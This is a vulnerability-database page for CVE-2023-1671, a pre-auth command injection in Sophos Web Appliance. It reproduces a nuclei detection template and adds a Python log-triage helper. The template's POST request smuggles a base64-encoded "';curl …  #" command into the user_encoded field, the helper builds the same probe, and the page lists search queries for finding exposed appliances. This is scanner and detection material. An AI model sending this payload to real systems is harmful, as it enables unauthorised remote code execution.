nuclei / ProjectDiscovery / NUCLEI:CVE-2023-1671
History: Apr 27, 2023 - 3:42 p.m.

Sophos Web Appliance - Remote Code Execution

2023-04-27 15:42:42
ProjectDiscovery
github.com
sophos
remote code execution
command injection
vulnerability
patch
interactsh

CVSS3: 9.8 High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH

AI Score: 9.7 High (Confidence: High)

EPSS: 0.965 High (Percentile: 99.6%)

A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.
id: CVE-2023-1671

info:
  name: Sophos Web Appliance - Remote Code Execution
  author: Co5mos
  severity: critical
  description: |
    A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches or updates provided by Sophos to mitigate this vulnerability.
  reference:
    - https://vulncheck.com/blog/cve-2023-1671-analysis
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1671
    - http://packetstormsecurity.com/files/172016/Sophos-Web-Appliance-4.3.10.4-Command-Injection.html
    - https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce
    - https://github.com/lions2012/Penetration_Testing_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-1671
    cwe-id: CWE-77
    epss-score: 0.96909
    epss-percentile: 0.99711
    cpe: cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sophos
    product: web_appliance
    shodan-query:
      - title:"Sophos Web Appliance"
      - http.title:"sophos web appliance"
      - http.favicon.hash:-893681401
    fofa-query:
      - title="Sophos Web Appliance"
      - title="sophos web appliance"
      - icon_hash=-893681401
    google-query: intitle:"sophos web appliance"
  tags: cve2023,cve,packetstorm,rce,sophos,oast,kev

http:
  - raw:
      - |
        POST /index.php?c=blocked&action=continue HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        args_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64("\';curl http://{{interactsh-url}} #")}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 4a0a004730450221008621e6fc19234e974d3b243fc784b9fc10e4fb849bc846258bb7a3f94d3524a80220303b2f3b771c041e111c4eebbb296b758f819b74a66b3b5c1ddf8ccbe777372e:922c64590222798bb761d5b6d8e72950
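The template above only confirms the bug by an out-of-band callback; it does not show what the injected value looks like once the appliance base64-decodes `user_encoded`, nor how to spot such probes in recorded traffic. The following is an added example, not part of the nuclei template or of Sophos' code. It rebuilds the form body in the shape the template sends (closing quote, command, `#` comment marker, base64-wrapped), then triages request records and flags a `user_encoded` value that decodes to shell metacharacters, but only for the warn-proceed handler (`/index.php?c=blocked&action=continue`), since that is the endpoint the advisory names. The sample requests, the `oast.example.invalid` host and the `jdoe` username are constructed for the example.

```python
"""Triage helper for CVE-2023-1671 probes against the Sophos Web Appliance
warn-proceed handler. Added example; not code from the nuclei template or from
Sophos. Request samples below are constructed, not real captures."""
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

WARN_PROCEED_PATH = "/index.php"
WARN_PROCEED_QUERY = {"c": "blocked", "action": "continue"}

# A username that legitimately round-trips through base64 is plain text;
# any of these characters in the decoded value signals a shell injection attempt.
SHELL_META = re.compile(r"[;&|`$'\"\\\r\n]")


def build_probe_body(command: str, url: str = "x", filetype: str = "x",
                     user: str = "x") -> str:
    """Form body in the shape the template sends: the command is wrapped as
    <quote>;<command> # and base64-encoded into user_encoded."""
    payload = f"';{command} #".encode()
    enc = base64.b64encode(payload).decode()
    return (f"args_reason=filetypewarn&url={url}&filetype={filetype}"
            f"&user={user}&user_encoded={enc}")


def is_warn_proceed(request_target: str) -> bool:
    """True only for the vulnerable handler: /index.php?c=blocked&action=continue."""
    parts = urlsplit(request_target)
    if parts.path != WARN_PROCEED_PATH:
        return False
    query = parse_qs(parts.query)
    return all(query.get(k) == [v] for k, v in WARN_PROCEED_QUERY.items())


def decode_user_encoded(body: str) -> Optional[str]:
    """Extract and base64-decode user_encoded from an x-www-form-urlencoded body.
    Percent-decodes only (unquote, not unquote_plus) so a literal '+' in the
    base64 alphabet survives; tolerates stripped padding."""
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        if unquote(key) != "user_encoded":
            continue
        raw = unquote(value)
        raw += "=" * (-len(raw) % 4)
        try:
            return base64.b64decode(raw, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            return None
    return None


def triage(request_target: str, body: str) -> Dict[str, object]:
    """Classify one request: is it aimed at the handler, what does user_encoded
    decode to, and does the decoded value carry shell metacharacters."""
    result: Dict[str, object] = {"warn_proceed": is_warn_proceed(request_target),
                                 "decoded_user": None, "suspicious": False}
    if not result["warn_proceed"]:
        return result
    decoded = decode_user_encoded(body)
    result["decoded_user"] = decoded
    result["suspicious"] = bool(decoded and SHELL_META.search(decoded))
    return result


# Constructed samples: a legitimate click-through, a probe shaped like the
# template's request, and an injection-looking value sent to a different handler.
SAMPLE_REQUESTS: List[Tuple[str, str]] = [
    ("/index.php?c=blocked&action=continue",
     "args_reason=filetypewarn&url=http%3A%2F%2Fexample.test%2Ffile.exe&filetype=exe"
     "&user=jdoe&user_encoded=" + base64.b64encode(b"jdoe").decode()),
    ("/index.php?c=blocked&action=continue",
     build_probe_body("curl http://oast.example.invalid")),
    ("/index.php?c=login",
     "user=jdoe&user_encoded=" + base64.b64encode(b"'; id #").decode()),
]


def scan(requests: List[Tuple[str, str]] = SAMPLE_REQUESTS):
    """Run triage over a list of (request_target, body) records."""
    return [(target, triage(target, body)) for target, body in requests]


if __name__ == "__main__":
    for target, verdict in scan():
        tag = "ALERT" if verdict["suspicious"] else "ok   "
        print(tag, target, repr(verdict["decoded_user"]))
```

The third sample is deliberately left unflagged: the same decoded value sent to another endpoint is not this vulnerability, and scoping the rule to the handler keeps the alert tied to the actual attack path rather than to any base64 blob with a quote in it. When feeding real proxy or WAF logs, pass the raw request target and the raw body so the percent-decoding and padding repair in `decode_user_encoded` can do their work.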
